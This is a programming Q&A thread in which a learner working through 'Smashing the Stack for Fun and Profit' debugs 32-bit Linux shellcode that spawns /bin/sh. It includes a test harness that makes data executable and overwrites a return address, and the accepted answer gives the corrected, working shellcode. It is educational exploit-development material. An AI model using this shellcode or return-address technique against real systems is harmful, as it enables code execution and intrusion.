# hex code implementation for spawning a shell

Tags: c, linux, shell, hex, buffer-overflow

I am trying to implement the codes given in [smashing the stack for fun and profit by Aleph](http://insecure.org/stf/smashstack.html) to learn the basics of buffer overflow attacks.

Machine architecture: Ubuntu 12.10 64 bit

programs compiled using -m32 flag in gcc

So far, I have managed to spawn a shell using the assembly instructions. The next step is to convert those instructions into hexadecimal code, where I have encountered this problem.
The assembly code for spawning the shell:

```c
void main() {
     __asm__(
        "Start:"
        "jmp    CallCode\n\t"
        "CallPop:"                    
        "popl   %esi\n\t"
        "movl   %esi,0x8(%esp)\n\t"           
        "xorl   %eax,%eax\n\t"                
        "movb   %al,0x7(%esp)\n\t"      
        "movl   %eax,0xc(%esp)\n\t"           
        "movb   $0xb,%al\n\t"                 
        "movl   %esi,%ebx\n\t"                
        "leal   0x8(%esp),%ecx\n\t"           
        "leal   0xc(%esp),%edx\n\t"           
        "int    $0x80\n\t"                    
        "xorl   %ebx,%ebx\n\t"                
        "movl   %ebx,%eax\n\t"                
        "inc    %eax\n\t"                     
        "int    $0x80\n\t"
        "CallCode:"                   
        "call   CallPop\n\t"                    
        ".string \"/bin/sh\"\n\t"
        );
 }
```

Corresponding hex code is:

```c
#include <sys/mman.h>
#include<stdio.h>

#define PAGE_SIZE 4096U

char shellcode[] = "\xeb\x24\x5e\x89\x74\x24\x08\x31\xc0\x88\x44\x24\x07\x89\x44\x24\x0c\xb0"
"\x0b\x89\xf3\x8d\x4c\x24\x08\x8d\x54\x24\x0c\xcd"
"\x80\x31\x89\xd8\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";


void test_shellcode() {

    int *ret;

    // The data section is non-executable
    // Change protection bits for the page containing our shellcode

    mprotect((void *)((unsigned int)shellcode & ~(PAGE_SIZE - 1)), 2 * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC);

    ret = (int*)((char *)&ret + 16);
    (*ret) = (int)shellcode;
}

int main() {
    test_shellcode();   
    return 0;
}
```

A bit of analysis using GDB Debugger led me to these results:

```
(gdb) run
Starting program: /home/peps/CCPP/Hello/testsc3 

Program received signal SIGILL, Illegal instruction.
0x0804a067 in shellcode ()
(gdb) x/s 0x0804a067
0x804a067 <shellcode+39>:   "\377\377\377/bin/sh"
```

After applying breakpoints, I think the problem lies somewhere in the hex code, which I have not been able to figure out. Also, I don't seem to understand the context of Illegal instruction here.

Any help would be appreciated.

Comment: `gdb` is able to disassemble machine code (e.g. with `dis` or `x/i`)

Comment: I have used disassemble command fair number of times, in fact the assembly code it generated has been used in the first code, and also was quite useful in finding the return addresses. But how to make use of it for finding problem in hex code, I am out of ideas here.

Answer (score 5, accepted):

You made a couple of mistakes in your shellcode.

```
char shellcode[] = 
"\xeb\x24\x5e\x89\x74\x24\x08\x31"
"\xc0\x88\x44\x24\x07\x89\x44\x24"
"\x0c\xb0\x0b\x89\xf3\x8d\x4c\x24"
"\x08\x8d\x54\x24\x0c\xcd\x80\x31"
"\xdb\x89\xd8\x40\xcd\x80\xe8\xd7"
"\xff\xff\xff/bin/sh";
```

Comment: it worked!! Thanks a lot!! What a silly silly error that was! My bad!!